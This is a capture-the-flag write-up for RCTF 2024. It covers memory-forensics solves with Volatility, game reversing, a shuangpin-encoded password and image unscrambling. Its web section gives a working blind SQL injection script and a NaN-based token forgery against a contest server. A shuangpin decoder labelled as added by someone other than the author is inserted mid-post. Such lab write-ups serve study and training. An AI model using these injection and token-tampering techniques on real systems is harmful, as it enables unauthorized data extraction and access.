RCTF 2024
This post was last updated 196 days ago; the information in it may have since developed or changed.

We had originally planned to give up on the first regional round: only three solves on day one, and with the Shanghai competition running at the same time we were badly short on people and energy.
In the final 9 hours the crypto guys scored big and we squeezed into the top twenty. Thanks to the team for the hard work.
Exhausted: HVV + RCTF + Shanghai + a stupid PPT contest defense, all-nighters every day, nearly dead.

Misc

Logo: Signin

logo="""
####################################################################################################
############################ # #####################################################################
####   ##       ########### ## ##          ###########                   ########             ######
####   ##           #########               ##########                   ######                  ###
####   ########       ########     ##########################    #############    ############    ##
####   ###########     ######    ###########   ##############    ############    ###################
###    #############    #####    ###########    #############    ############    ###################
###    ##############   ####    #############   #############   #############    ###################
###    ##############    ###    #############    ############   ##############     #################
###    ##############    ###   ###############   ############   ###############      ###############
###    ##############   ####   ###############   ############   #################      #############
###    #############    ####   ###############   ###########    ####################      ##########
###    ############    #####   ###############   ###########    ######################     #########
###    ####           ######   ##############    ###########    ########################     #######
###    ####         ########    #############    ###########    ##########################    ######
###    #########    #########   #############   ############    ##########################    ######
###    ##########    ########    ###########   #############    ##########################    ######
###    ###########    ########    #########    #############    #############    #########    ######
###    ############   #########     ######   ############       ###############     ####     #######
###   ############## ###########         ############                  #########           #########
#### ###############################  ##############################################    ############
####################################################################################################
""".strip()

Logo: 2024

Tried to dig out a new CVE and experimented with compression algorithms, but it went nowhere (verdict: too many escape challenges, my brain is no longer working properly).

  • Plenty of teams have already posted writeups, so I won't copy one here; this challenge isn't very generalizable anyway.

s1ayth3sp1re

  • Beat the game with the Cheat Engine memory editor
  • Or reverse it with jadx and search directly for 3000
if (this.j > 3000) {
    int[] iArr = {164, 158, 95, 107, 4, 215, 108, 115, 5, 8, 25, 57, 41, 236, 231, 17, 85};
    int[] iArr2 = {246, 221, 11, 45, WindowsKeycodes.VK_F16, 148, 45, 36, 70, 73, 78, 8, 98, Keyboard.KEY_NUMPADEQUALS, 140, 112, 40};
    String str = "";
    for (int i = 0; i < iArr.length; i++) {
        str = str + String.valueOf((char) (iArr[i] ^ iArr2[i]));
    }
    int[] iArr3 = {100, 174, 197, 56};
    int[] iArr4 = {2, LinuxKeycodes.XK_Acircumflex, 164, 95};
    String str2 = "";
    for (int i2 = 0; i2 < iArr3.length; i2++) {
        str2 = str2 + String.valueOf((char) (iArr3[i2] ^ iArr4[i2]));
    }
    this.d.add(new GameOverStat(str2, null, str));
}
from pwn import xor
a = [164, 158, 95, 107, 4, 215, 108, 115, 5, 8, 25, 57, 41, 236, 231, 17, 85]
b = [246, 221, 11, 45, 127, 148, 45, 36, 70, 73, 78, 8, 98, 141, 140, 112, 40]
# xor() flattens plain ints as machine words, so pass bytes to XOR one byte per value
print(xor(bytes(a), bytes(b)))

FindAHacker

  • After pslist, notice that there is an IDA process
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit                          
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xfffffa8018d94840 System                    4      0     70      356 ------      0 2024-05-19 06:58:31 UTC+0000                                 
0xfffffa8019355950 smss.exe                200      4      2       30 ------      0 2024-05-19 06:58:31 UTC+0000                                 
0xfffffa8019de0b30 csrss.exe               288    280      9      425      0      0 2024-05-19 06:58:32 UTC+0000                                 
0xfffffa801a00d060 csrss.exe               380    372     10      185      1      0 2024-05-19 06:58:33 UTC+0000                                 
0xfffffa801a00a420 wininit.exe             388    280      4       80      0      0 2024-05-19 06:58:33 UTC+0000                                 
0xfffffa801a082750 services.exe            440    388     12      209      0      0 2024-05-19 06:58:33 UTC+0000                                 
0xfffffa801a0bc4d0 winlogon.exe            464    372      4      111      1      0 2024-05-19 06:58:34 UTC+0000                                 
0xfffffa801a0c6400 lsass.exe               492    388     10      560      0      0 2024-05-19 06:58:34 UTC+0000                                 
0xfffffa801a0c8060 lsm.exe                 500    388     11      143      0      0 2024-05-19 06:58:34 UTC+0000                                 
0xfffffa801a1535f0 svchost.exe             620    440     15      367      0      0 2024-05-19 06:58:35 UTC+0000                                 
0xfffffa801a16db30 vmacthlp.exe            684    440      4       56      0      0 2024-05-19 06:58:36 UTC+0000                                 
0xfffffa801a17e060 svchost.exe             728    440      9      248      0      0 2024-05-19 06:58:36 UTC+0000                                 
0xfffffa801a1a25e0 svchost.exe             792    440     17      309      0      0 2024-05-19 06:58:36 UTC+0000                                 
0xfffffa8018e60250 svchost.exe             864    440     31      650      0      0 2024-05-19 06:58:36 UTC+0000                                 
0xfffffa801a1ecb30 svchost.exe             916    440     14      485      0      0 2024-05-19 06:58:36 UTC+0000                                 
0xfffffa801a207450 svchost.exe             964    440     12      216      0      0 2024-05-19 06:58:36 UTC+0000                                 
0xfffffa801a217b30 svchost.exe            1004    440     19      340      0      0 2024-05-19 06:58:36 UTC+0000                                 
0xfffffa801a25d4a0 svchost.exe             328    440      6      104      0      0 2024-05-19 06:58:37 UTC+0000                                 
0xfffffa801a2d8060 VGAuthService.          240    440      3       91      0      0 2024-05-19 06:58:38 UTC+0000                                 
0xfffffa801a2f8600 vmtoolsd.exe            276    440      9      272      0      0 2024-05-19 06:58:39 UTC+0000                                 
0xfffffa801a302b30 ManagementAgen         1048    440     11       91      0      0 2024-05-19 06:58:39 UTC+0000                                 
0xfffffa801a3b3870 svchost.exe            1228    440      7      100      0      0 2024-05-19 06:58:40 UTC+0000                                 
0xfffffa801a3d25f0 dllhost.exe            1332    440     21      210      0      0 2024-05-19 06:58:40 UTC+0000                                 
0xfffffa801a3ee060 WmiPrvSE.exe           1428    620     11      188      0      0 2024-05-19 06:58:40 UTC+0000                                 
0xfffffa801a400b30 dllhost.exe            1492    440     17      210      0      0 2024-05-19 06:58:40 UTC+0000                                 
0xfffffa801a41bb30 taskhost.exe           1576    440     10      175      1      0 2024-05-19 06:58:41 UTC+0000                                 
0xfffffa801a47e4f0 sppsvc.exe             1788    440      5      152      0      0 2024-05-19 06:58:43 UTC+0000                                 
0xfffffa801a4ae390 msdtc.exe              1848    440     16      156      0      0 2024-05-19 06:58:44 UTC+0000                                 
0xfffffa801a4e3060 dwm.exe                1400    964      7      118      1      0 2024-05-19 06:58:51 UTC+0000                                 
0xfffffa801a4e0060 explorer.exe           1480   1292     28      601      1      0 2024-05-19 06:58:51 UTC+0000                                 
0xfffffa801a53fb30 vmtoolsd.exe           1468   1480      7      191      1      0 2024-05-19 06:58:56 UTC+0000                                 
0xfffffa801a544060 Poner.exe              1420   1480      9      214      1      1 2024-05-19 06:58:56 UTC+0000                                 
0xfffffa801a5d09e0 WmiPrvSE.exe           1756    620     12      255      0      0 2024-05-19 06:59:00 UTC+0000                                 
0xfffffa801a604b30 WmiApSrv.exe           1932    440      7      112      0      0 2024-05-19 06:59:01 UTC+0000                                 
0xfffffa801a6eeb30 idaq64.exe             2172   2156      7      275      1      1 2024-05-19 06:59:21 UTC+0000                                 

Solution 1

  • Dump the process memory and import it into GIMP to get a screenshot of IDA
$ volatility -f Windows_7_x64_52Pojie_2-Snapshot2.vmem --profile=Win7SP1x64 memdump -p 2172 -D ./
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing idaq64.exe [  2172] to 2172.dmp
  • Two pieces of data can be read off
353f4e2b566b746a5d6d6f736c773868596e20213c714f09367d557251322766
0c0f2b486f5d46536459594b5f475b5b6b5f15165d12766b071b334a67071100
  • XOR them together
Python 3.10.10 (tags/v3.10.10:aad5f6a, Feb  7 2023, 17:20:36) [MSC v.1929 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> a = "353f4e2b566b746a5d6d6f736c773868596e20213c714f09367d557251322766"
>>> b = "0c0f2b486f5d46536459594b5f475b5b6b5f15165d12766b071b334a67071100"
>>> from pwn import xor
>>> xor(bytes.fromhex(a), bytes.fromhex(b))
b'90ec9629946830c32157ac9b1ff8656f'

Solution 2

  • filescan reveals an enc.i64; export it with Volatility 3
$ python3 vol.py -f ../Windows_7_x64_52Pojie_2-Snapshot2.vmem filescan.FileScan | grep i64
0x7e578330 100.0\Users\Administrator\Desktop\enc.i64 216

$ python3 vol.py -f ../Windows_7_x64_52Pojie_2-Snapshot2.vmem dumpfiles.DumpFiles --physaddr 0x7e578330 
Volatility 3 Framework 2.5.0
Progress:  100.00               PDB scanning finished                        
Cache   FileObject      FileName        Result

DataSectionObject       0x7e578330      enc.i64 file.0x7e578330.0xfa801a460940.DataSectionObject.enc.i64.dat
  • Open it in IDA

gogogo

  • Clearly Firefox-related: dump all .sqlite files; places.sqlite contains a Baidu Netdisk link
$ vol.py -f gogogo.raw --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000007f634f80 -D ./ 
Volatility Foundation Volatility Framework 2.6.1
DataSectionObject 0x7f634f80   None   \Device\HarddiskVolume1\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\s1qv2uam.de
SharedCacheMap 0x7f634f80   None   \Device\HarddiskVolume1\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\s1qv2uam.defau
https://pan.baidu.com/share/init?surl=ZllFd8IK-oHvTCYl61_7Kw
  • Found the password in the clipboard (forgot I had already found it and got stuck right here)
$ vol.py -f gogogo.raw --profile=Win7SP1x86_23418 clipboard                            
Volatility Foundation Volatility Framework 2.6.1
Session    WindowStation Format                 Handle Object     Data                                              
---------- ------------- ------------------ ---------- ---------- --------------------------------------------------
         1 WinSta0       CF_UNICODETEXT       0x2c01b1 0xfcf3c570 cwqs                                              
         1 WinSta0       0x0L                     0x10 ----------                                                   
         1 WinSta0       0x0L                      0x0 ----------                                                   
         1 WinSta0       0x0L                      0x0 ----------                                                   
         1 ------------- ------------------   0x240189 0xfcbf0390
niuo ybufmefhui kjqillxdjwmi uizebuuidvooudpn uibuui jqybdm vegeyisivemeuoll jxysgowodmnkderf dbmzfa hkhkdazizvjnybufme hkwjdeggmana mimajqueviigkyllda doqisl bapnynqrpnqrxcxxzimu
  • strings reveals a Bilibili user (when will I finally learn the strings trick)
https://space.bilibili.com/3546644702301067
  • Decode with a Shuangpin (double-pinyin) input method to get the password
你说 有什么方式 看起来像加密 (You said, what way could look like encryption)
是这不是 对哦 (Isn't this it? Oh right)
双拼 是不是 就有点 这个意思 (Shuangpin, isn't that kind of the idea)
这么说来 借用过我电脑的人 都没法 好好打字 (Come to think of it, anyone who borrowed my computer couldn't type properly)
最近有什么 好玩的跟妈 那 密码就设置成 (Anything fun lately with mom; then set the password to)
快来打 夺旗赛 吧 (Come and play the CTF)
拼音全拼 全小写字母 (Full pinyin, all lowercase letters)
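The clipboard string is Shuangpin input: every syllable is typed as two keys, an initial key followed by a final key, and the key layout matches the Ziranma (自然码) scheme when checked against the lines decoded above. As an added example (not the author's code), here is a decoder from that layout back to full pinyin; the rules for keys that stand for two finals are a heuristic of mine covering standard syllables, not a complete syllable table.

```python
# Added example: Ziranma-layout shuangpin -> full pinyin (not the author's code).
FINALS = {  # default reading of each final key; two-reading keys are fixed in resolve_final
    "q": "iu", "w": "ia", "e": "e", "r": "uan", "t": "ue", "y": "ing",
    "u": "u", "i": "i", "o": "uo", "p": "un", "a": "a", "s": "ong",
    "d": "uang", "f": "en", "g": "eng", "h": "ang", "j": "an", "k": "ao",
    "l": "ai", "z": "ei", "x": "ie", "c": "iao", "v": "ui", "b": "ou",
    "n": "in", "m": "ian",
}
INITIALS = {"u": "sh", "i": "ch", "v": "zh"}  # two-letter initials that sit on one key
ZERO_INITIAL = {"ah": "ang", "eg": "eng"}    # vowel-only syllables not spelled out in full

def resolve_final(initial, key):
    """Pick the reading of a two-reading key from the initial (heuristic, assumption)."""
    if key == "w":
        return "ia" if initial in ("j", "q", "x", "l", "d") else "ua"
    if key == "y":
        return "uai" if initial in ("g", "k", "h", "zh", "ch", "sh") else "ing"
    if key == "o":
        return "o" if initial in ("b", "p", "m", "f", "w") else "uo"
    if key == "s":
        return "iong" if initial in ("j", "q", "x") else "ong"
    if key == "d":
        return "iang" if initial in ("j", "q", "x", "l", "n") else "uang"
    if key == "t":
        return "ve" if initial in ("n", "l") else "ue"   # lve/nve vs jue/que/xue/yue
    if key == "v":
        return "v" if initial in ("n", "l") else "ui"    # nv/lv vs dui/zui/...
    return FINALS[key]

def decode_syllable(pair):
    first, second = pair
    if first in "aeo":   # zero-initial syllable: "oo" -> o, "ah" -> ang, "ai" -> ai
        return first if first == second else ZERO_INITIAL.get(pair, pair)
    initial = INITIALS.get(first, first)
    return initial + resolve_final(initial, second)

def decode_shuangpin(text):
    """Return one space-separated pinyin string per whitespace-separated token."""
    out = []
    for token in text.split():
        if len(token) % 2 or not token.isalpha():
            raise ValueError(f"not a shuangpin token: {token!r}")
        out.append(" ".join(decode_syllable(token[i:i + 2])
                            for i in range(0, len(token), 2)))
    return out

if __name__ == "__main__":
    for line in decode_shuangpin("niuo ybufmefhui"):  # first two clipboard tokens
        print(line)                                     # ni shuo / you shen me fang shi
```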

Sec-image

from PIL import Image

for flag in range(10):
    filename = 'flag{}.png'.format(flag)
    img = Image.open(filename)
    size = img.size
    weight = int(size[0] // 40)
    height = int(size[1] // 40)

    ress = []
    for i in range(4):
        res = Image.new('RGB',(400,400))
        ress.append(res)

    for j in range(40):
        for i in range(40):
            box = (weight * i, height * j, weight * (i + 1), height * (j + 1))
            region = img.crop(box)
            for n in range(4*100):
                pos = n // 4
                x = pos % 10
                y = pos // 10
                pos2 = n % 4
                ii = pos2 % 2
                jj = pos2 // 2
                tmp = region.getpixel((x*2+ii,y*2+jj))
                ress[pos2].putpixel((i*10+x,j*10+y),tmp)

    for i in range(4):
        ress[i].save('./{}.png'.format(flag*4+i))

Web

what_is_love

  • key1: boolean-based blind injection
from requests import post
from string import printable

url = "http://ip:port/key1"

printable = bytes(sorted(list(printable.encode()))).decode().replace(")", "").replace("(", "")
payload = "'||love_key>='RCTF{"
while True:
    for i in range(len(printable)):
        test = payload + printable[i]
        data = {"key1": test}
        resp = post(url, data=data)
        if resp.text == "wrong":
            payload += printable[i - 1]
            break
    print(payload)
  • key2: use NaN + Number to modify userinfo
createToken({username: "",love_time: NaN,have_lovers: true,})
// eyJ1c2VybmFtZSI6IiIsImxvdmVfdGltZSI6bnVsbCwiaGF2ZV9sb3ZlcnMiOnRydWV9.6711263ca1c25b2bcc973a4d2c989adfacab694ef5406650c1cf58a178b42fbe
from requests import post

url = "http://ip:port/check"

data = {"love_token": "eyJ1c2VybmFtZSI6IiIsImxvdmVfdGltZSI6bnVsbCwiaGF2ZV9sb3ZlcnMiOnRydWV9.6711263ca1c25b2bcc973a4d2c989adfacab694ef5406650c1cf58a178b42fbe"}

resp = post(url, data=data)
print(resp.text)